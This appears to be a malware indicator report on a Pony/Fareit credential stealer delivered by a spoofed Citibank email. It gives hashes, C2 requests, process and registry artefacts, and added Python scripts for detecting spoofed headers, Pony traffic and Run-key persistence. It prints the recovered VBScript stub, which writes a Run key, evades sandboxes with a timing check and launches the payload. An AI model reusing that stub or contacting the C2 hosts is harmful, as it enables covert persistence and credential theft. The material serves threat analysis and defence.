- #IOC #OptiData #VR #Pony #Fareit #ACE
- https://pastebin.com/u0D14L5r
- FAQ:
- https://radetskiy.wordpress.com/?s=fareit
- attack_vector
- --------------
- email attachment (.ace archive) > extracted exe > dropped to %temp%\subfolder\filename.exe (on the analysis host %temp% apparently resolved to C:\tmp, which is the path seen in the proc and persist entries below)
- email_headers
- --------------
- Received: from plesk2.qsoftweb.com (plesk2.qsoftweb.com [78.46.145.250])
- by mailsrv2.victim1.com (8.15.2/8.15.2) with SMTP id w9I9rvLr042922
- for <user01@org3.victim1.com>; Thu, 18 Oct 2018 12:54:08 +0300 (EEST)
- (envelope-from spoof@citicorp.com)
- Received: from webmail.edwise.pk (localhost [IPv6:::1])
- by plesk2.qsoftweb.com (Postfix) with ESMTPSA id 7CE3E20B62;
- Thu, 18 Oct 2018 05:44:02 -0400 (EDT)
- Date: Thu, 18 Oct 2018 10:44:02 +0100
- From: CITIBANK <spoof@citicorp.com>
- To: undisclosed-recipients:;
- Subject: Payment Slip - Payment remitted 15/10/2018
- X-Sender: spoof@citicorp.com
- User-Agent: Roundcube Webmail/1.3.6
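The headers above give the lure away before any attachment is opened: From/envelope-from claim citicorp.com, but the first Received hop shows the message was handed to the victim MTA by plesk2.qsoftweb.com, and the originating hop is webmail.edwise.pk via Roundcube. The following script is an added example, not part of the original paste; it walks the Received chain and reports those mismatches. The header text is embedded as a constructed sample copied from the excerpt above, and the function names and the "last two labels" domain heuristic are assumptions for illustration.

```python
"""Spot a spoofed sender by walking the Received chain (added example)."""
import re

# Constructed sample: the Received/From headers quoted in the paste.
SAMPLE_HEADERS = """\
Received: from plesk2.qsoftweb.com (plesk2.qsoftweb.com [78.46.145.250])
 by mailsrv2.victim1.com (8.15.2/8.15.2) with SMTP id w9I9rvLr042922
 for <user01@org3.victim1.com>; Thu, 18 Oct 2018 12:54:08 +0300 (EEST)
 (envelope-from spoof@citicorp.com)
Received: from webmail.edwise.pk (localhost [IPv6:::1])
 by plesk2.qsoftweb.com (Postfix) with ESMTPSA id 7CE3E20B62;
 Thu, 18 Oct 2018 05:44:02 -0400 (EDT)
Date: Thu, 18 Oct 2018 10:44:02 +0100
From: CITIBANK <spoof@citicorp.com>
To: undisclosed-recipients:;
Subject: Payment Slip - Payment remitted 15/10/2018
X-Sender: spoof@citicorp.com
User-Agent: Roundcube Webmail/1.3.6
"""


def unfold(raw):
    """Join RFC 5322 folded continuation lines (leading whitespace) onto their header."""
    lines = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line)
    return lines


def parse_headers(raw):
    """Return a list of (name, value) pairs; Received repeats, so no dict here."""
    out = []
    for line in unfold(raw):
        name, _, value = line.partition(":")
        out.append((name.strip().lower(), value.strip()))
    return out


def received_hops(headers):
    """Extract (from_host, by_host) for every Received header, newest hop first."""
    hops = []
    for name, value in headers:
        if name != "received":
            continue
        m_from = re.search(r"\bfrom\s+(\S+)", value)
        m_by = re.search(r"\bby\s+(\S+)", value)
        hops.append((m_from.group(1) if m_from else None,
                     m_by.group(1) if m_by else None))
    return hops


def registered_domain(host_or_addr):
    """Crude 'last two labels' domain (assumption; use a public-suffix list in production)."""
    host = host_or_addr.rsplit("@", 1)[-1].strip("<>")
    return ".".join(host.lower().split(".")[-2:])


def spoof_findings(raw):
    """Return human-readable reasons the message's claimed sender does not match its path."""
    headers = parse_headers(raw)
    hdr = dict(headers)  # last value wins; fine for single-valued headers
    findings = []
    from_addr = re.search(r"<([^>]+)>", hdr.get("from", ""))
    from_dom = registered_domain(from_addr.group(1)) if from_addr else None
    hops = received_hops(headers)
    # The hop that handed the message to our MTA is the first Received line.
    handoff_from, _handoff_by = hops[0] if hops else (None, None)
    if from_dom and handoff_from and registered_domain(handoff_from) != from_dom:
        findings.append(f"From domain {from_dom} but delivered by {handoff_from}")
    # The last Received line shows where the message was really injected.
    if len(hops) > 1:
        origin_from, origin_by = hops[-1]
        if origin_from and from_dom and registered_domain(origin_from) != from_dom:
            findings.append(f"Originating host {origin_from} via {origin_by} is not in {from_dom}")
    if "undisclosed-recipients" in hdr.get("to", "").lower():
        findings.append("To: undisclosed-recipients (bulk/BCC send)")
    ua = hdr.get("user-agent", "")
    if "webmail" in ua.lower():
        findings.append(f"Composed in webmail ({ua}), unusual for a bank notification")
    return findings


if __name__ == "__main__":
    for f in spoof_findings(SAMPLE_HEADERS):
        print(f)
```

The first Received line is the only hop your own MTA wrote, so it is the one you can trust; everything below it can be forged, but here the forger did not bother, and the Roundcube User-Agent plus the ESMTPSA (authenticated submission) on plesk2.qsoftweb.com point at a compromised webmail account on that host.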
- email_subjects
- --------------
- Payment Slip - Payment remitted 15/10/2018
- files
- --------------
- SHA-256 ad73105314b633bff23b5f9065d1f2ed3248ea6ad1a69c2893021c9618ce6fa3
- File name Payment slip.ace
- File size 264.85 KB
- SHA-256 3c616a7c56f6e2bdf4d878e2ada4662f7b70215aa474135c5d463af0e78c6783
- File name Kakih > %temp%\subfolder\filename.exe
- File size 618.27 KB
- activity
- **************
- netwrk
- --------------
- 194.36.173.171 armansaykham.com POST /nonso/gate.php HTTP/1.0 Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- 67.227.226.240 pornhouse.mobi GET /main.php?dir=//Virgin%20Babes%20First%20Sex&start=1&sort=1 HTTP/1.0 Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
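Both requests above are HTTP/1.0 with the legacy "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" User-Agent that Pony/Fareit hard-codes, and the check-in is a POST to a gate.php path. Below is an added example, not from the original paste, that runs those indicators and the behavioural rule over proxy-style log lines. The log format (src_ip dst_ip host method path version "user-agent") is a constructed simplification, the sample lines are the two requests above plus benign noise, and the function names are assumptions.

```python
"""Flag Pony/Fareit check-ins in proxy logs (added example)."""
import re

# IOCs taken from the paste.
C2_HOSTS = {"armansaykham.com"}
C2_IPS = {"194.36.173.171"}
# Pony's hard-coded User-Agent: HTTP/1.0 and a claim of MSIE 5.0 on Windows 98.
PONY_UA = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"

# Constructed sample log: the two requests from the paste plus benign traffic.
SAMPLE_LOG = """\
10.0.0.5 194.36.173.171 armansaykham.com POST /nonso/gate.php HTTP/1.0 "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
10.0.0.5 67.227.226.240 pornhouse.mobi GET /main.php?dir=//Virgin%20Babes%20First%20Sex&start=1&sort=1 HTTP/1.0 "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
10.0.0.7 93.184.216.34 example.com GET /index.html HTTP/1.1 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/69.0"
10.0.0.9 203.0.113.10 cdn.example.net POST /api/gate.php HTTP/1.1 "curl/7.61.0"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\S+) (HTTP/\d\.\d) "([^"]*)"$')


def parse_line(line):
    """Parse one constructed-format log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, dst, host, method, path, version, ua = m.groups()
    return {"src": src, "dst": dst, "host": host, "method": method,
            "path": path, "version": version, "ua": ua}


def classify(rec):
    """Return the reasons a record looks like Pony traffic (empty list = clean)."""
    reasons = []
    if rec["host"] in C2_HOSTS or rec["dst"] in C2_IPS:
        reasons.append("known C2 indicator")
    if rec["ua"] == PONY_UA:
        reasons.append("Pony hard-coded User-Agent")
    # Behavioural rule independent of the IOC list: HTTP/1.0 POST to a gate.php.
    # It will need tuning against your own baseline; HTTP/1.1 gate.php POSTs are ignored.
    if rec["method"] == "POST" and rec["version"] == "HTTP/1.0" and rec["path"].endswith("gate.php"):
        reasons.append("HTTP/1.0 POST to gate.php")
    return reasons


def scan(log_text):
    """Return {src_ip: [(host, reasons), ...]} for every record with at least one reason."""
    hits = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            hits.setdefault(rec["src"], []).append((rec["host"], reasons))
    return hits


if __name__ == "__main__":
    for src, items in scan(SAMPLE_LOG).items():
        for host, reasons in items:
            print(f"{src} -> {host}: {', '.join(reasons)}")
```

The pornhouse.mobi request carries no C2 indicator but the same User-Agent, which is why the UA rule is kept separate from the IOC match: it catches the infected host's other traffic (compare the ESTABLISHED connection from filename.exe to 67.227.226.240 in the comp section) after the C2 domain has moved.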
- comp
- --------------
- [System Process] 0 TCP 194.36.173.171 80 TIME_WAIT
- filename.exe 2160 TCP 67.227.226.240 80 ESTABLISHED
- proc
- --------------
- "C:\Users\operator\Desktop\Payment slip.exe"
- "C:\Windows\System32\WScript.exe" "C:\tmp\subfolder\filename.vbs"
- "C:\tmp\subfolder\filename.exe"
- "C:\tmp\subfolder\filename.exe"
- C:\Windows\SysWOW64\cmd.exe /c ""C:\tmp\7710921.bat" "C:\tmp\subfolder\filename.exe" "
- vbs
- --------------
- ' Persistence stub dropped as %temp%\subfolder\filename.vbs (C:\tmp on the analysis host). Code as recovered; comments added.
- On Error Resume Next
- Set WshShell = CreateObject("WScript.Shell")
- myKey = "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Registry Key Name"
- Vbs ="C:\tmp\subfolder\filename.vbs"
- ' First run (no arguments): sleep 5 s and verify that at least 5 s of wall-clock time really passed.
- ' A sandbox that fast-forwards Sleep fails the check, so the Run value is never written there.
- If WScript.Arguments.Count = 0 Then
- GG = second(now)
- WScript.Sleep 5000
- VV = second(now)
- Vbs = Vbs & " -FF"
- If Abs(VV-GG) => 5 then WshShell.RegWrite myKey,Vbs,"REG_SZ"
- WScript.Quit
- end if
- ' Later runs (started from the Run key with the -FF argument): launch the payload.
- WshShell.Run """C:\tmp\subfolder\filename.exe"""
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 18.10.2018 17:32
- Registry Key Name c:\tmp\subfolder\filename.vbs 18.10.2018 17:32
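The Run value above is the artefact that survives a reboot, and its shape (a .vbs under a temp directory, run via the script's own registration with a -FF argument) is generic enough to hunt for across a fleet. The script below is an added example, not from the original paste; it parses the text that `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` prints (one "Name  Type  Data" row per value) and flags entries that launch a script or point into a temp directory. The sample dump is constructed from the persist entry above (with the -FF argument the VBS registers) plus two benign rows; the extension and directory lists and the function names are assumptions.

```python
"""Hunt Run-key persistence that launches a script from a temp directory (added example)."""
import re

# Constructed 'reg query' output: one suspicious value and two normal ones.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\operator\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Registry Key Name    REG_SZ    C:\tmp\subfolder\filename.vbs -FF
    Updater    REG_EXPAND_SZ    %ProgramFiles%\Vendor\updater.exe
"""

# reg query separates the columns of a value row with four spaces.
ROW_RE = re.compile(r"^\s{4}(.+?)\s{4}(REG_\w+)\s{4}(.*)$")
# Assumed lists; extend to taste.
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1", ".bat", ".cmd")
TEMP_DIRS = ("\\tmp\\", "\\temp\\")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe")


def parse_reg_query(text):
    """Return [(value_name, reg_type, data)] for each value row of a reg query dump."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append(m.groups())
    return rows


def first_path(data):
    """Pull the launched file out of the value data: a quoted path, else the first token."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data
    return data.split(" ", 1)[0]


def suspicious(data):
    """Reasons a Run entry looks like malware persistence (empty list = nothing unusual)."""
    reasons = []
    target = first_path(data).lower()
    if target.endswith(SCRIPT_EXT):
        reasons.append("launches a script rather than an executable")
    if any(d in target for d in TEMP_DIRS):
        reasons.append("target lives under a temp directory")
    if any(h in target for h in SCRIPT_HOSTS):
        reasons.append("explicit script host in Run value")
    return reasons


def hunt(reg_text):
    """Return [(value_name, data, reasons)] for every flagged Run entry."""
    hits = []
    for name, _reg_type, data in parse_reg_query(reg_text):
        reasons = suspicious(data)
        if reasons:
            hits.append((name, data, reasons))
    return hits


if __name__ == "__main__":
    for name, data, reasons in hunt(SAMPLE_REG_QUERY):
        print(f"{name!r} -> {data}: {'; '.join(reasons)}")
```

Feed it the output of `reg query` collected per user hive (the value lives under HKCU, so check every loaded profile, not just the one you are logged in as), and pair a hit with the process tree: here the same path appears as the argument of WScript.exe in the proc section.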
- drop
- --------------
- C:\tmp\subfolder\filename.exe
- C:\tmp\subfolder\filename.vbs
- # # #
- https://www.virustotal.com/#/file/ad73105314b633bff23b5f9065d1f2ed3248ea6ad1a69c2893021c9618ce6fa3/details
- https://www.virustotal.com/#/file/3c616a7c56f6e2bdf4d878e2ada4662f7b70215aa474135c5d463af0e78c6783/details
- https://analyze.intezer.com/#/analyses/52017eed-c2d4-4da9-be09-a1a57f09cfa5
- Harvests credentials from local FTP client software
- Harvests information related to installed mail clients